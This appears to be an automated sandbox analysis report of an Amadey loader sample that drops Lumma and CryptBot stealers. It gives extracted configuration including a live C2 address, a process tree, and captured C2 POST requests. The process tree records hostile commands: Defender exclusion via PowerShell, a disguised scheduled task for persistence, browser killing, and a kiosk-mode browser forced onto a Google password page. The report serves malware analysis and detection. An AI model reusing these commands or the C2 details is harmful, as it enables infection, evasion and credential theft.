Analysis

  • max time kernel
    147s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20-12-2024 04:46

General

  • Target

    a3d6d7eea1a9270e20be65394c942207078daac5952a12a9404dd4c557fd2944.exe

  • Size

    2.9MB

  • MD5

    cd7686b11754d77b8722880a1a3a9a43

  • SHA1

    ea1c00d2985812539452a31d8f75506573dad692

  • SHA256

    a3d6d7eea1a9270e20be65394c942207078daac5952a12a9404dd4c557fd2944

  • SHA512

    64d095a52c5a9987cbdbe00c95cd96db67d5bf9faa9a53c1132eab27be7d0d8b7adf209195db8b925c6453ada759165ecfc8c1a5ac4f3ea7d3427fea2b643cab

  • SSDEEP

    49152:30HhKY2JwV6AskokjOnIY/cy6oMjYnJpY2Q2AM6J6OK:3mAJwV6AsFkiIycy6odnJ1Q2AM6J6O

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain
1
006700e5a2ab05704bbb0c589b88924d

Extracted

Family

lumma

Extracted

Family

cryptbot

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • CryptBot

    CryptBot is a C++ stealer distributed widely in bundle with other software.

  • Cryptbot family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 22 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 41 IoCs
  • Identifies Wine through registry keys 2 TTPs 11 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 61 IoCs
  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 33 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 5 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 63 IoCs
  • Suspicious use of AdjustPrivilegeToken 52 IoCs
  • Suspicious use of FindShellTrayWindow 15 IoCs
  • Suspicious use of SendNotifyMessage 13 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1216
      • C:\Users\Admin\AppData\Local\Temp\a3d6d7eea1a9270e20be65394c942207078daac5952a12a9404dd4c557fd2944.exe
        "C:\Users\Admin\AppData\Local\Temp\a3d6d7eea1a9270e20be65394c942207078daac5952a12a9404dd4c557fd2944.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Identifies Wine through registry keys
        • Loads dropped DLL
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:3000
        • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
          "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2744
          • C:\Users\Admin\AppData\Local\Temp\1018207001\823e4bdbcb.exe
            "C:\Users\Admin\AppData\Local\Temp\1018207001\823e4bdbcb.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1532
            • C:\Users\Admin\AppData\Local\Temp\1018207001\823e4bdbcb.exe
              "C:\Users\Admin\AppData\Local\Temp\1018207001\823e4bdbcb.exe"
              5⤵
              • Executes dropped EXE
              PID:3060
            • C:\Users\Admin\AppData\Local\Temp\1018207001\823e4bdbcb.exe
              "C:\Users\Admin\AppData\Local\Temp\1018207001\823e4bdbcb.exe"
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:2684
          • C:\Users\Admin\AppData\Local\Temp\1018208001\fcc74b3f6b.exe
            "C:\Users\Admin\AppData\Local\Temp\1018208001\fcc74b3f6b.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            PID:756
          • C:\Users\Admin\AppData\Local\Temp\1018209001\efa2c9faee.exe
            "C:\Users\Admin\AppData\Local\Temp\1018209001\efa2c9faee.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2492
            • C:\Users\Admin\AppData\Local\Temp\1018209001\efa2c9faee.exe
              "C:\Users\Admin\AppData\Local\Temp\1018209001\efa2c9faee.exe"
              5⤵
              • Executes dropped EXE
              PID:2112
            • C:\Users\Admin\AppData\Local\Temp\1018209001\efa2c9faee.exe
              "C:\Users\Admin\AppData\Local\Temp\1018209001\efa2c9faee.exe"
              5⤵
              • Executes dropped EXE
              PID:1056
            • C:\Users\Admin\AppData\Local\Temp\1018209001\efa2c9faee.exe
              "C:\Users\Admin\AppData\Local\Temp\1018209001\efa2c9faee.exe"
              5⤵
              • Executes dropped EXE
              PID:1688
            • C:\Users\Admin\AppData\Local\Temp\1018209001\efa2c9faee.exe
              "C:\Users\Admin\AppData\Local\Temp\1018209001\efa2c9faee.exe"
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2992
          • C:\Users\Admin\AppData\Local\Temp\1018210001\4ab1990554.exe
            "C:\Users\Admin\AppData\Local\Temp\1018210001\4ab1990554.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:2072
          • C:\Users\Admin\AppData\Local\Temp\1018211001\fb41eb2b6d.exe
            "C:\Users\Admin\AppData\Local\Temp\1018211001\fb41eb2b6d.exe"
            4⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2740
          • C:\Users\Admin\AppData\Local\Temp\1018212001\7e8e0935c9.exe
            "C:\Users\Admin\AppData\Local\Temp\1018212001\7e8e0935c9.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1740
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Add-MpPreference -ExclusionPath "C:\gzlhd"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:908
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2628
          • C:\Users\Admin\AppData\Local\Temp\1018213001\bb52f2e013.exe
            "C:\Users\Admin\AppData\Local\Temp\1018213001\bb52f2e013.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:2976
            • C:\Windows\system32\cmd.exe
              cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
              5⤵
              • Loads dropped DLL
              PID:1664
              • C:\Windows\system32\mode.com
                mode 65,10
                6⤵
                  PID:2376
                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                  7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of AdjustPrivilegeToken
                  PID:756
                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                  7z.exe e extracted/file_7.zip -oextracted
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1492
                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                  7z.exe e extracted/file_6.zip -oextracted
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2572
                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                  7z.exe e extracted/file_5.zip -oextracted
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2820
                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                  7z.exe e extracted/file_4.zip -oextracted
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1936
                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                  7z.exe e extracted/file_3.zip -oextracted
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2516
                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                  7z.exe e extracted/file_2.zip -oextracted
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3048
                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                  7z.exe e extracted/file_1.zip -oextracted
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3056
                • C:\Windows\system32\attrib.exe
                  attrib +H "in.exe"
                  6⤵
                  • Views/modifies file attributes
                  PID:536
                • C:\Users\Admin\AppData\Local\Temp\main\in.exe
                  "in.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2656
                  • C:\Windows\system32\attrib.exe
                    attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                    7⤵
                    • Views/modifies file attributes
                    PID:1368
                  • C:\Windows\system32\attrib.exe
                    attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                    7⤵
                    • Views/modifies file attributes
                    PID:316
                  • C:\Windows\system32\schtasks.exe
                    schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                    7⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:2672
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell ping 127.0.0.1; del in.exe
                    7⤵
                    • System Network Configuration Discovery: Internet Connection Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:584
                    • C:\Windows\system32\PING.EXE
                      "C:\Windows\system32\PING.EXE" 127.0.0.1
                      8⤵
                      • System Network Configuration Discovery: Internet Connection Discovery
                      • Runs ping.exe
                      PID:3564
            • C:\Users\Admin\AppData\Local\Temp\1018214001\16d019449f.exe
              "C:\Users\Admin\AppData\Local\Temp\1018214001\16d019449f.exe"
              4⤵
              • Enumerates VirtualBox registry keys
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:3212
            • C:\Users\Admin\AppData\Local\Temp\1018215001\3fc6c7cc3a.exe
              "C:\Users\Admin\AppData\Local\Temp\1018215001\3fc6c7cc3a.exe"
              4⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              PID:3848
            • C:\Users\Admin\AppData\Local\Temp\1018216001\d5ca7bb125.exe
              "C:\Users\Admin\AppData\Local\Temp\1018216001\d5ca7bb125.exe"
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:4400
              • C:\Users\Admin\AppData\Local\Temp\1018216001\d5ca7bb125.exe
                "C:\Users\Admin\AppData\Local\Temp\1018216001\d5ca7bb125.exe"
                5⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:4584
            • C:\Users\Admin\AppData\Local\Temp\1018217001\52d5fcdb6e.exe
              "C:\Users\Admin\AppData\Local\Temp\1018217001\52d5fcdb6e.exe"
              4⤵
              • Executes dropped EXE
              PID:4960
            • C:\Users\Admin\AppData\Local\Temp\1018218001\d7b9a49095.exe
              "C:\Users\Admin\AppData\Local\Temp\1018218001\d7b9a49095.exe"
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:5308
              • C:\Users\Admin\AppData\Local\Temp\1018218001\d7b9a49095.exe
                "C:\Users\Admin\AppData\Local\Temp\1018218001\d7b9a49095.exe"
                5⤵
                • Executes dropped EXE
                PID:2628
              • C:\Users\Admin\AppData\Local\Temp\1018218001\d7b9a49095.exe
                "C:\Users\Admin\AppData\Local\Temp\1018218001\d7b9a49095.exe"
                5⤵
                • Executes dropped EXE
                PID:2148
              • C:\Users\Admin\AppData\Local\Temp\1018218001\d7b9a49095.exe
                "C:\Users\Admin\AppData\Local\Temp\1018218001\d7b9a49095.exe"
                5⤵
                • Executes dropped EXE
                PID:3036
              • C:\Users\Admin\AppData\Local\Temp\1018218001\d7b9a49095.exe
                "C:\Users\Admin\AppData\Local\Temp\1018218001\d7b9a49095.exe"
                5⤵
                • Executes dropped EXE
                PID:1704
              • C:\Users\Admin\AppData\Local\Temp\1018218001\d7b9a49095.exe
                "C:\Users\Admin\AppData\Local\Temp\1018218001\d7b9a49095.exe"
                5⤵
                • Executes dropped EXE
                PID:1756
            • C:\Users\Admin\AppData\Local\Temp\1018219001\e57707a59c.exe
              "C:\Users\Admin\AppData\Local\Temp\1018219001\e57707a59c.exe"
              4⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:5544
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" Add-MpPreference -ExclusionPath "C:\vrudwla"
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:5708
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:5936
            • C:\Users\Admin\AppData\Local\Temp\1018220001\dee2c68b58.exe
              "C:\Users\Admin\AppData\Local\Temp\1018220001\dee2c68b58.exe"
              4⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:6444
            • C:\Users\Admin\AppData\Local\Temp\1018221001\718410bf88.exe
              "C:\Users\Admin\AppData\Local\Temp\1018221001\718410bf88.exe"
              4⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:7060
            • C:\Users\Admin\AppData\Local\Temp\1018222001\e7be8f4ce0.exe
              "C:\Users\Admin\AppData\Local\Temp\1018222001\e7be8f4ce0.exe"
              4⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:7616
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM firefox.exe /T
                5⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:7668
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM chrome.exe /T
                5⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:7824
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM msedge.exe /T
                5⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:7936
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM opera.exe /T
                5⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:8040
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM brave.exe /T
                5⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:8176
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                5⤵
                  PID:8328
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                    6⤵
                    • Checks processor information in registry
                    • Modifies registry class
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    PID:8344
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="8344.0.1061018301\1480083165" -parentBuildID 20221007134813 -prefsHandle 1268 -prefMapHandle 1260 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e0143e47-2b0d-4e5b-9817-f055db30ca12} 8344 "\\.\pipe\gecko-crash-server-pipe.8344" 1368 12d09d58 gpu
                      7⤵
                        PID:8768
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="8344.1.1822939534\268606202" -parentBuildID 20221007134813 -prefsHandle 1516 -prefMapHandle 1512 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bcd6832b-aeba-4d01-9399-fa92a9a0d9ab} 8344 "\\.\pipe\gecko-crash-server-pipe.8344" 1536 e71b58 socket
                        7⤵
                          PID:8896
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="8344.2.342355675\1549248957" -childID 1 -isForBrowser -prefsHandle 2072 -prefMapHandle 2068 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 704 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a685d5bc-4f6d-4dff-ac31-b6c6e99b07de} 8344 "\\.\pipe\gecko-crash-server-pipe.8344" 2084 196b0058 tab
                          7⤵
                            PID:9324
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="8344.3.1431874660\1925169667" -childID 2 -isForBrowser -prefsHandle 2600 -prefMapHandle 2544 -prefsLen 26151 -prefMapSize 233444 -jsInitHandle 704 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cfceaabe-52cf-406f-821f-eda4edb85732} 8344 "\\.\pipe\gecko-crash-server-pipe.8344" 2616 1b71a258 tab
                            7⤵
                              PID:10028
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="8344.4.833286185\368724119" -childID 3 -isForBrowser -prefsHandle 3720 -prefMapHandle 3716 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 704 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5ce81fed-f745-42c3-ab75-87bd5fc3ec34} 8344 "\\.\pipe\gecko-crash-server-pipe.8344" 3732 2041e658 tab
                              7⤵
                                PID:8236
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="8344.5.1277610581\1533465890" -childID 4 -isForBrowser -prefsHandle 3844 -prefMapHandle 3848 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 704 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0b2e47da-e0a2-4b30-8546-80d477cc01cd} 8344 "\\.\pipe\gecko-crash-server-pipe.8344" 3832 2041f258 tab
                                7⤵
                                  PID:8444
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="8344.6.1822098279\25709156" -childID 5 -isForBrowser -prefsHandle 3952 -prefMapHandle 3956 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 704 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {64c90383-2dfc-4622-af38-657948ca3abd} 8344 "\\.\pipe\gecko-crash-server-pipe.8344" 3940 2041c558 tab
                                  7⤵
                                    PID:8524
                            • C:\Users\Admin\AppData\Local\Temp\1018223001\ce6585282d.exe
                              "C:\Users\Admin\AppData\Local\Temp\1018223001\ce6585282d.exe"
                              4⤵
                              • Modifies Windows Defender Real-time Protection settings
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Windows security modification
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3432
                            • C:\Users\Admin\AppData\Local\Temp\1018224001\e0ef35828f.exe
                              "C:\Users\Admin\AppData\Local\Temp\1018224001\e0ef35828f.exe"
                              4⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              PID:4080
                        • C:\Windows\SysWOW64\dialer.exe
                          "C:\Windows\system32\dialer.exe"
                          2⤵
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          PID:2908
                      • C:\Windows\system32\taskeng.exe
                        taskeng.exe {76A95B8B-5472-44E7-ACAD-64543A478BEE} S-1-5-21-4177215427-74451935-3209572229-1000:JSMURNPT\Admin:Interactive:[1]
                        1⤵
                        • Loads dropped DLL
                        PID:1296
                        • C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                          C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Suspicious behavior: EnumeratesProcesses
                          PID:1328
                          • C:\Windows\explorer.exe
                            explorer.exe
                            3⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:952
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                            3⤵
                            • Drops file in System32 directory
                            • System Network Configuration Discovery: Internet Connection Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3088
                            • C:\Windows\system32\PING.EXE
                              "C:\Windows\system32\PING.EXE" 127.1.10.1
                              4⤵
                              • System Network Configuration Discovery: Internet Connection Discovery
                              • Runs ping.exe
                              PID:3232

                      Network

                      • flag-ru
                        POST
                        http://185.215.113.43/Zu7JuNko/index.php
                        skotes.exe
                        Remote address:
                        185.215.113.43:80
                        Request
                        POST /Zu7JuNko/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.43
                        Content-Length: 4
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:46:31 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                      • flag-ru
                        POST
                        http://185.215.113.43/Zu7JuNko/index.php
                        skotes.exe
                        Remote address:
                        185.215.113.43:80
                        Request
                        POST /Zu7JuNko/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.43
                        Content-Length: 156
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:46:33 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                      • flag-ru
                        POST
                        http://185.215.113.43/Zu7JuNko/index.php
                        skotes.exe
                        Remote address:
                        185.215.113.43:80
                        Request
                        POST /Zu7JuNko/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.43
                        Content-Length: 31
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:46:37 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                      • flag-ru
                        POST
                        http://185.215.113.43/Zu7JuNko/index.php
                        skotes.exe
                        Remote address:
                        185.215.113.43:80
                        Request
                        POST /Zu7JuNko/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.43
                        Content-Length: 31
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:46:41 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                      • flag-ru
